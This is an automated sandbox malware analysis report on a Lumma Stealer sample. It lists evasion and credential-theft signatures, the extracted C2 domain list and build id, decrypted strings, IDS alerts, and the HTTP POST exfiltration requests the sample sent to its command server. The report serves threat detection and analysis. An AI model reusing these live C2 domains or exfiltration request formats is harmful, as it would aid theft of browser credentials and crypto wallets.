Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1545111
MD5:263307cbc603bef82f9365cc2fd70b46
SHA1:7b6eda920d7b71d23befdaca8a40362c8aadd4cf
SHA256:5db93dc71e9af5cd5df48dc571a0f7d08430bdcec03292a88928436ae0c75708
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6136 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 263307CBC603BEF82F9365CC2FD70B46)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["thumbystriw.store", "fadehairucw.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2089349102.0000000001646000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2089206820.0000000001642000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: file.exe PID: 6136JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
          Process Memory Space: file.exe PID: 6136JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: file.exe PID: 6136JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:16:01.272406+010020546531A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
              2024-10-30T06:16:02.433640+010020546531A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:16:01.272406+010020498361A Network Trojan was detected192.168.2.549704188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:16:02.433640+010020498121A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:16:00.238748+010020571241Domain Observed Used for C2 Detected192.168.2.549704188.114.96.3443TCP
              2024-10-30T06:16:01.952542+010020571241Domain Observed Used for C2 Detected192.168.2.549705188.114.96.3443TCP
              2024-10-30T06:16:03.419365+010020571241Domain Observed Used for C2 Detected192.168.2.549706188.114.96.3443TCP
              2024-10-30T06:16:04.820527+010020571241Domain Observed Used for C2 Detected192.168.2.549707188.114.96.3443TCP
              2024-10-30T06:16:06.125733+010020571241Domain Observed Used for C2 Detected192.168.2.549708188.114.96.3443TCP
              2024-10-30T06:16:07.654384+010020571241Domain Observed Used for C2 Detected192.168.2.549709188.114.96.3443TCP
              2024-10-30T06:16:09.165357+010020571241Domain Observed Used for C2 Detected192.168.2.549710188.114.96.3443TCP
              2024-10-30T06:16:11.282563+010020571241Domain Observed Used for C2 Detected192.168.2.549711188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:15:59.541033+010020571291Domain Observed Used for C2 Detected192.168.2.5632501.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:15:59.573155+010020571271Domain Observed Used for C2 Detected192.168.2.5577361.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:15:59.596182+010020571231Domain Observed Used for C2 Detected192.168.2.5524801.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:15:59.318552+010020571311Domain Observed Used for C2 Detected192.168.2.5631131.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:15:59.584908+010020571251Domain Observed Used for C2 Detected192.168.2.5595971.1.1.153UDP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-30T06:16:05.357470+010020480941Malware Command and Control Activity Detected192.168.2.549707188.114.96.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.6136.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "fadehairucw.store", "presticitpo.store", "necklacedmny.store", "founpiuer.store", "crisiwarny.store", "navygenerayk.store", "scriptyprefej.store"], "Build id": "4SD0y4--legendaryy"}
              Multi AV Scanner detection for domain / URL
              Source: necklacedmny.storeVirustotal: Detection: 22%Perma Link
              Source: presticitpo.storeVirustotal: Detection: 11%Perma Link
              Source: thumbystriw.storeVirustotal: Detection: 14%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.2132299363.0000000000021000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.5:63113 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.5:59597 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.5:57736 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.5:52480 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.5:63250 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49708 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49706 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49707 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49711 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49707 -> 188.114.96.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15082Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20572Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1247Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585622Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2073304947.0000000005E3D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2045451295.0000000005D68000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045396119.0000000005D6B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2045541325.0000000005D68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2089267859.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100311602.000000000163D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/?19
              Source: file.exe, 00000000.00000002.2133401840.000000000164B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/G11
              Source: file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/W1
              Source: file.exe, file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.0000000001638000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129107930.0000000001632000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129236427.0000000001650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129209034.0000000001637000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2101214765.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100331725.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100206696.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133401840.0000000001651000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2133160668.00000000015F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100355676.0000000001652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api0
              Source: file.exe, 00000000.00000003.2129194532.000000000164B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129236427.0000000001650000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129222308.000000000164C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api8
              Source: file.exe, 00000000.00000002.2133401840.0000000001651000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiU
              Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiZ
              Source: file.exe, 00000000.00000002.2133160668.00000000015A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apisn
              Source: file.exe, 00000000.00000003.2100374761.0000000001637000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apix
              Source: file.exe, 00000000.00000003.2101201718.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2100291812.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073292088.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2074182580.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2111114745.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2134598475.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2129063200.0000000005DCA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2073166648.0000000005DC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2072961661.0000000005DC7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2086706919.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/d
              Source: file.exe, 00000000.00000002.2134513001.0000000005D30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/ed
              Source: file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api.default-release/key4.dbPK
              Source: file.exe, 00000000.00000002.2133160668.00000000015C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiicrosoft
              Source: file.exe, 00000000.00000003.2074209325.000000000605E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
